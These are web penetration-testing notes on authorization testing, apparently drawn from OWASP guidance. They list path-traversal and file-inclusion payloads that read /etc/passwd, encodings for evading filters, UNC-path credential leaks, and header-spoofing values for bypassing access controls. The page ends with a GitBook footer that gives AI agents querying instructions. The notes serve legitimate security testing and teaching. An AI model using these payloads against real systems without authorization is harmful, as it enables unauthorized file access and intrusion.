> For the complete documentation index, see [llms.txt](https://zeyad-abulaban.gitbook.io/notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://zeyad-abulaban.gitbook.io/notes/web-penetration-testing/authorization-testing.md).

# Authorization Testing

***

## Directory Traversal File Include (LFI)

### Input Vectors Enumeration

checks to be performed:

* Are there request parameters which could be used for file-related operations?
* Are there unusual file extensions?
* Are there interesting variable names?
  * `http://example.com/getUserProfile.jsp?item=ikki.html`
  * `http://example.com/index.php?file=content`
  * `http://example.com/main.cgi?home=index.html`
* Is it possible to identify cookies used by the web application for the dynamic generation of pages or templates?
  * `Cookie: ID=d9ccd3f4f9f18cc1:TM=2166255468:LM=1162655568:S=3cFpqbJgMSSPKVMV:TEMPLATE=flower`
  * `Cookie: USER=1826cc8f:PSTYLE=GreenDotRed`

### Testing Techniques

```
http://example.com/getUserProfile.jsp?item=../../../../etc/passwd
```

For the cookies example:

```
Cookie: USER=1826cc8f:PSTYLE=../../../../etc/passwd
```

It’s also possible to include files and scripts located on external website:

```
http://example.com/index.php?file=http://www.owasp.org/malicioustxt
```

If protocols are accepted as arguments, as in the above example, it’s also possible to probe the local filesystem this way:

```
http://example.com/index.php?file=file:///etc/passwd
```

If protocols are accepted as arguments, as in the above examples, it’s also possible to probe the local services and nearby services:

```
http://example.com/index.php?file=http://localhost:8080
http://example.com/index.php?file=http://192.168.0.2:9080
```

The following example will demonstrate how it is possible to show the source code of a CGI component, without using any path traversal characters if it's present in the same directory.

```
http://example.com/main.cgi?home=main.cgi
```

> **Tip:** It’s a common mistake by developers to not expect every form of encoding and therefore only do validation for basic encoded content. If at first the test string isn’t successful, try another encoding scheme.

Each operating system uses different characters as path separator:

* Unix-like OS:
  * root directory: `/`
  * directory separator: `/`
* Windows OS:
  * root directory: `<drive letter>:`
  * directory separator: `\` or `/`
* Classic macOS:
  * root directory: `<drive letter>:`
  * directory separator: `:`

We should take in to account the following character encoding mechanisms:

* URL encoding and double URL encoding
  * `%2e%2e%2f` represents `../`
  * `%2e%2e/` represents `../`
  * `..%2f` represents `../`
  * `%2e%2e%5c` represents `..\`
  * `%2e%2e\` represents `..\`
  * `..%5c` represents `..\`
  * `%252e%252e%255c` represents `..\`
  * `..%255c` represents `..\` and so on.
* Unicode/UTF-8 Encoding (it only works in systems that are able to accept overlong UTF-8 sequences)
  * `..%c0%af` represents `../`
  * `..%c1%9c` represents `..\`

There are other OS and application framework specific considerations as well. For instance, Windows is flexible in its parsing of file paths.

* Windows shell: Appending any of the following to paths used in a shell command results in no difference in function:
  * Angle brackets `<` and `>` at the end of the path
  * Double quotes (closed properly) at the end of the path
  * Extraneous current directory markers such as `./` or `.\\`
  * Extraneous parent directory markers with arbitrary items that may or may not exist:
    * `file.txt`
    * `file.txt...`
    * `file.txt<spaces>`
    * `file.txt""""`
    * `file.txt<<<>>><`
    * `./././file.txt`
    * `nonexistant/../file.txt`

**Windows API**: The following items are discarded when used in any shell command or API call where a string is taken as a filename: - `periods` - `spaces`

* **Windows UNC Filepaths**: Used to reference files on SMB shares. Sometimes, an application can be made to refer to files on a remote UNC filepath. If so, the Windows SMB server may send stored credentials to the attacker, which can be captured and cracked. These may also be used with a self-referential IP address or domain name to evade filters, or used to access files on SMB shares inaccessible to the attacker, but accessible from the web server.
  * `\\server_or_ip\path\to\file.abc`
  * `\\?\server_or_ip\path\to\file.abc`
* **Windows NT Device Namespace**: Used to refer to the Windows device namespace. Certain references will allow access to file systems using a different path.
  * May be equivalent to a drive letter such as `c:\`, or even a drive volume without an assigned letter: `\\.\GLOBALROOT\Device\HarddiskVolume1\`
  * Refers to the first disc drive on the machine: `\\.\CdRom0\`

## Bypassing Authorization Schema

### Horizontal Bypassing Authorization Schema

* Is it possible to access resources that should be accessible to a user that holds a different identity with the same role or privilege?
* Is it possible to operate functions on resources that should be accessible to a user that holds a different identity?

**For each role:**

1. Register or generate two users with identical privileges.
2. Establish and keep two different sessions active (one for each user).
3. For every request, change the relevant parameters and the session identifier from token one to token two and diagnose the responses for each token.
4. An application will be considered vulnerable if the responses are the same, contain same private data or indicate successful operation on other users’ resource or data.

### Vertical Bypassing Authorization Schema

**For each role:**

1. Register a user.
2. Establish and maintain two different sessions based on the two different roles.
3. For every request, change the session identifier from the original to another role’s session identifier and evaluate the responses for each.
4. An application will be considered vulnerable if the weaker privileged session contains the same data, or indicate successful operations on higher privileged functions.

### Testing for Special Request Header Handling

Some applications support non-standard headers such as `X-Original-URL` or `X-Rewrite-URL` in order to allow overriding the target URL in requests with the one specified in the header value.

### Other Headers to Consider

* Headers:
  * `X-Forwarded-For`
  * `X-Forward-For`
  * `X-Remote-IP`
  * `X-Originating-IP`
  * `X-Remote-Addr`
  * `X-Client-IP`
* Values
  * `127.0.0.1` (or anything in the `127.0.0.0/8` or `::1/128` address spaces)
  * `localhost`
  * Any [RFC1918](https://tools.ietf.org/html/rfc1918) address:
    * `10.0.0.0/8`
    * `172.16.0.0/12`
    * `192.168.0.0/16`
  * Link local addresses: `169.254.0.0/16`

> Note: Including a port element along with the address or hostname may also help bypass edge protections such as web application firewalls, etc. For example: `127.0.0.4:80`, `127.0.0.4:443`, `127.0.0.4:43982`

## Rails-extension

You can access the data in different formats by modifying the extension in url e.g `/users/1 -> /users/1.json` -> [Reference](https://pentesterlab.com/exercises/autho_03/course)

## ORM-Risk

Assuming the application has two levels of privileges, changing the parameter from `user[username]=admin&user[password]=lol` -> `user[admin]=admin&user[password]=lol` could lead to accessing admin panel. -> [Reference+ Explaination](https://pentesterlab.com/exercises/autho_04/course)


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://zeyad-abulaban.gitbook.io/notes/web-penetration-testing/authorization-testing.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.